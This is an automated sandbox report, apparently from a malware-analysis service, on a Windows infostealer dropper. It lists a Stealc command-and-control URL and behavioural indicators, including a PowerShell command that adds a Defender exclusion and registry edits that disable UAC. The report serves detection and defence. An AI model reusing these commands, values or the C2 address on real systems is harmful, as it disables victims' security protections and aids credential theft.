Analysis
max time kernel: 113s
max time network: 174s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted: 28-03-2024 12:58
Static task
static1
Behavioral task
behavioral1
Sample
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
Resource
win10v2004-20240226-en
General
Target: ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
Size: 395KB
MD5: 47ca0c7940583630b294c30a8e1960b2
SHA1: 50978f49401da7fbbc8b9b4706262e5bcb6afd51
SHA256: ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae
SHA512: dcade30e9f8564a6291a68669b683d3be6bc71a62389004efb7424ab2231c9b92f17d2939c7e56eb6634b76305ed5e7b10f2f6de9341953c47adbd6bccfea8e9
SSDEEP: 12288:Vmz6kx6tp09A/b07Un67M8RW9FjSUzkvO9Vj:VG6kxy6S/b0Ingg9954G9V
Malware Config
Extracted
stealc
http://185.172.128.209
url_path: /3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 15 IoCs
Processes:
resource yara_rule behavioral1/memory/2696-81-0x0000000003020000-0x000000000390B000-memory.dmp family_glupteba behavioral1/memory/2696-86-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-98-0x0000000002FA0000-0x000000000388B000-memory.dmp family_glupteba behavioral1/memory/2772-100-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-196-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-204-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-155-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-241-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-281-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-310-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-331-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-372-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2772-373-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/1556-375-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba behavioral1/memory/2696-378-0x0000000000400000-0x0000000000ED4000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
qwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" qwm9RVjuf5jbu5aLONlULih1.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid Process procid_target PID 4812 created 2424 4812 RegAsm.exe 43 -
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe -
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeqwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" qwm9RVjuf5jbu5aLONlULih1.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
qwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ qwm9RVjuf5jbu5aLONlULih1.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid Process 5744 netsh.exe 5732 netsh.exe 6080 netsh.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
qwm9RVjuf5jbu5aLONlULih1.exeInstall.exeInstall.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qwm9RVjuf5jbu5aLONlULih1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qwm9RVjuf5jbu5aLONlULih1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeregasm.exedGRFal8qQzpgtFutf7LbHsxR.exeInstall.exeInstall.exeu1ag.0.exeHDGDHCGCBK.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation regasm.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation dGRFal8qQzpgtFutf7LbHsxR.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation u1ag.0.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation HDGDHCGCBK.exe -
Drops startup file 10 IoCs
Processes:
regasm.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1zODrmp3iqlrL70ymyHxHZ7.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WqzERsVQn7Fh6H7riw3XMctE.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CK1PRR7vT9hwKY8Cnvi9ejSQ.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ByEgmEpg5srbU2rlGXxRbXGK.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6mCOvw8IOvhsjYTRr5tzFkti.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dy3Y8CbcBbk8bLrqg34ruIUM.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1tUqGOHmvmtiu9fUnhmEeuZe.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H2Mos0hDS1RNNHOs9Fqvxf0h.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Upstr2kazNGla9Rp077HNRay.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11x6QP3HUzuw3mwoRGyd4zeP.bat regasm.exe -
Executes dropped EXE 23 IoCs
Processes:
dGRFal8qQzpgtFutf7LbHsxR.exeHJcsbqzHq8hiX6npx01bsD0k.exegOQS8nuAiujAwUuADEy77FZC.exe9J0qa6e7aiaDLK5JDqoWIdOI.exeqwm9RVjuf5jbu5aLONlULih1.exe8CLOmIiMrlPxKA256rlqHgAu.exeu1ag.0.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeu1ag.1.exe9As7Ub276Pn8UYWeX7WAnwst.exe5TVfzHVntQFq0XimVhZ7m8WF.exeInstall.exeInstall.exeInstall.exeInstall.exeHDGDHCGCBK.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exepid Process 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 2696 HJcsbqzHq8hiX6npx01bsD0k.exe 2772 gOQS8nuAiujAwUuADEy77FZC.exe 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 3420 qwm9RVjuf5jbu5aLONlULih1.exe 1556 8CLOmIiMrlPxKA256rlqHgAu.exe 820 u1ag.0.exe 1308 LfewfClIhATqHqW1CxsJIhoA.exe 888 LfewfClIhATqHqW1CxsJIhoA.exe 4820 LfewfClIhATqHqW1CxsJIhoA.exe 2996 LfewfClIhATqHqW1CxsJIhoA.exe 3916 LfewfClIhATqHqW1CxsJIhoA.exe 4956 u1ag.1.exe 5368 9As7Ub276Pn8UYWeX7WAnwst.exe 5376 5TVfzHVntQFq0XimVhZ7m8WF.exe 5788 Install.exe 5864 Install.exe 5796 Install.exe 1400 Install.exe 5628 HDGDHCGCBK.exe 5780 Assistant_108.0.5067.20_Setup.exe_sfx.exe 4420 assistant_installer.exe 1440 assistant_installer.exe -
Loads dropped DLL 11 IoCs
Processes:
LfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exeu1ag.0.exeassistant_installer.exeassistant_installer.exepid Process 1308 LfewfClIhATqHqW1CxsJIhoA.exe 888 LfewfClIhATqHqW1CxsJIhoA.exe 4820 LfewfClIhATqHqW1CxsJIhoA.exe 2996 LfewfClIhATqHqW1CxsJIhoA.exe 3916 LfewfClIhATqHqW1CxsJIhoA.exe 820 u1ag.0.exe 820 u1ag.0.exe 4420 assistant_installer.exe 4420 assistant_installer.exe 1440 assistant_installer.exe 1440 assistant_installer.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x000200000001e720-112.dat themida behavioral1/memory/3420-135-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-143-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-145-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-146-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-149-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-153-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-154-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-156-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida behavioral1/memory/3420-239-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp themida -
Processes:
resource yara_rule behavioral1/files/0x0009000000023226-225.dat upx behavioral1/memory/4956-279-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/4956-340-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeqwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" qwm9RVjuf5jbu5aLONlULih1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeqwm9RVjuf5jbu5aLONlULih1.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qwm9RVjuf5jbu5aLONlULih1.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
LfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exedescription ioc Process File opened (read-only) \??\D: LfewfClIhATqHqW1CxsJIhoA.exe File opened (read-only) \??\F: LfewfClIhATqHqW1CxsJIhoA.exe File opened (read-only) \??\D: LfewfClIhATqHqW1CxsJIhoA.exe File opened (read-only) \??\F: LfewfClIhATqHqW1CxsJIhoA.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 83 ipinfo.io 85 ipinfo.io 81 api.myip.com 82 api.myip.com -
Drops file in System32 directory 6 IoCs
Processes:
Install.exeqwm9RVjuf5jbu5aLONlULih1.exeInstall.exedescription ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy qwm9RVjuf5jbu5aLONlULih1.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini qwm9RVjuf5jbu5aLONlULih1.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol qwm9RVjuf5jbu5aLONlULih1.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI qwm9RVjuf5jbu5aLONlULih1.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
qwm9RVjuf5jbu5aLONlULih1.exepid Process 3420 qwm9RVjuf5jbu5aLONlULih1.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe9J0qa6e7aiaDLK5JDqoWIdOI.exedescription pid Process procid_target PID 2256 set thread context of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 4988 set thread context of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc Process File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exepid Process 4668 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 3852 4988 WerFault.exe 105 3080 1672 WerFault.exe 99 5728 4812 WerFault.exe 108 5144 4812 WerFault.exe 108 5952 820 WerFault.exe 112 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u1ag.0.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1ag.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1ag.0.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 5196 schtasks.exe 4372 schtasks.exe 5664 schtasks.exe 5724 schtasks.exe 4348 schtasks.exe 3876 schtasks.exe 6004 schtasks.exe 2112 schtasks.exe 5384 schtasks.exe 5880 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exeInstall.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Processes:
LfewfClIhATqHqW1CxsJIhoA.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 LfewfClIhATqHqW1CxsJIhoA.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 LfewfClIhATqHqW1CxsJIhoA.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 LfewfClIhATqHqW1CxsJIhoA.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exeu1ag.0.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpid Process 2844 powershell.exe 2844 powershell.exe 820 u1ag.0.exe 820 u1ag.0.exe 4812 RegAsm.exe 4812 RegAsm.exe 5568 dialer.exe 5568 dialer.exe 5568 dialer.exe 5568 dialer.exe 6032 powershell.exe 6032 powershell.exe 6040 powershell.exe 6040 powershell.exe 6048 powershell.exe 6048 powershell.exe 6032 powershell.exe 6048 powershell.exe 6040 powershell.exe 4200 powershell.EXE 4200 powershell.EXE 820 u1ag.0.exe 820 u1ag.0.exe 4200 powershell.EXE 4204 powershell.EXE 4204 powershell.EXE 4204 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeregasm.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdescription pid Process Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 3380 regasm.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 6040 powershell.exe Token: SeDebugPrivilege 6048 powershell.exe Token: SeDebugPrivilege 4200 powershell.EXE Token: SeDebugPrivilege 4204 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
u1ag.1.exepid Process 4956 u1ag.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exeregasm.exe9J0qa6e7aiaDLK5JDqoWIdOI.exedGRFal8qQzpgtFutf7LbHsxR.exeLfewfClIhATqHqW1CxsJIhoA.exeLfewfClIhATqHqW1CxsJIhoA.exedescription pid Process procid_target PID 2256 wrote to memory of 2844 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 87 PID 2256 wrote to memory of 2844 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 87 PID 2256 wrote to memory of 2152 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 88 PID 2256 wrote to memory of 2152 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 88 PID 2256 wrote to memory of 2152 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 88 PID 2256 wrote to memory of 2816 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 91 PID 2256 wrote to memory of 2816 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 91 PID 2256 wrote to memory of 2816 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 91 PID 2256 wrote to memory of 3552 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 92 PID 2256 wrote to memory of 3552 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 92 PID 2256 wrote to memory of 3552 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 92 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 
wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 2256 wrote to memory of 3380 2256 ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe 93 PID 3380 wrote to memory of 1672 3380 regasm.exe 99 PID 3380 wrote to memory of 1672 3380 regasm.exe 99 PID 3380 wrote to memory of 1672 3380 regasm.exe 99 PID 3380 wrote to memory of 2696 3380 regasm.exe 101 PID 3380 wrote to memory of 2696 3380 regasm.exe 101 PID 3380 wrote to memory of 2696 3380 regasm.exe 101 PID 3380 wrote to memory of 2772 3380 regasm.exe 103 PID 3380 wrote to memory of 2772 3380 regasm.exe 103 PID 3380 wrote to memory of 2772 3380 regasm.exe 103 PID 3380 wrote to memory of 4988 3380 regasm.exe 105 PID 3380 wrote to memory of 4988 3380 regasm.exe 105 PID 3380 wrote to memory of 4988 3380 regasm.exe 105 PID 3380 wrote to memory of 3420 3380 regasm.exe 107 PID 3380 wrote to memory of 3420 3380 regasm.exe 107 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 4988 wrote to memory of 4812 4988 9J0qa6e7aiaDLK5JDqoWIdOI.exe 108 PID 3380 wrote to memory of 1556 3380 regasm.exe 109 PID 3380 wrote to memory of 1556 3380 regasm.exe 109 PID 3380 wrote to memory of 1556 3380 regasm.exe 109 
PID 1672 wrote to memory of 820 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 112 PID 1672 wrote to memory of 820 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 112 PID 1672 wrote to memory of 820 1672 dGRFal8qQzpgtFutf7LbHsxR.exe 112 PID 3380 wrote to memory of 1308 3380 regasm.exe 115 PID 3380 wrote to memory of 1308 3380 regasm.exe 115 PID 3380 wrote to memory of 1308 3380 regasm.exe 115 PID 1308 wrote to memory of 888 1308 LfewfClIhATqHqW1CxsJIhoA.exe 116 PID 1308 wrote to memory of 888 1308 LfewfClIhATqHqW1CxsJIhoA.exe 116 PID 1308 wrote to memory of 888 1308 LfewfClIhATqHqW1CxsJIhoA.exe 116 PID 1308 wrote to memory of 4820 1308 LfewfClIhATqHqW1CxsJIhoA.exe 118 PID 1308 wrote to memory of 4820 1308 LfewfClIhATqHqW1CxsJIhoA.exe 118 PID 1308 wrote to memory of 4820 1308 LfewfClIhATqHqW1CxsJIhoA.exe 118 PID 1308 wrote to memory of 2996 1308 LfewfClIhATqHqW1CxsJIhoA.exe 119 PID 1308 wrote to memory of 2996 1308 LfewfClIhATqHqW1CxsJIhoA.exe 119 PID 1308 wrote to memory of 2996 1308 LfewfClIhATqHqW1CxsJIhoA.exe 119 PID 2996 wrote to memory of 3916 2996 LfewfClIhATqHqW1CxsJIhoA.exe 120 PID 2996 wrote to memory of 3916 2996 LfewfClIhATqHqW1CxsJIhoA.exe 120 -
System policy modification 1 TTPs 1 IoCs
Processes:
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
Processes
- C:\Windows\system32\sihost.exe | sihost.exe | PID 2424
  - C:\Windows\SysWOW64\dialer.exe | "C:\Windows\system32\dialer.exe" | PID 5568
    - Suspicious behavior: EnumeratesProcesses
- C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | "C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe" | PID 2256
  - UAC bypass
  - Windows security bypass
  - Checks computer location settings
  - Windows security modification
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - System policy modification
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe" -Force | PID 2844
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" | PID 2152
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" | PID 2816
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" | PID 3552
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" | PID 3380
    - Checks computer location settings
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe | "C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe" | PID 1672
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
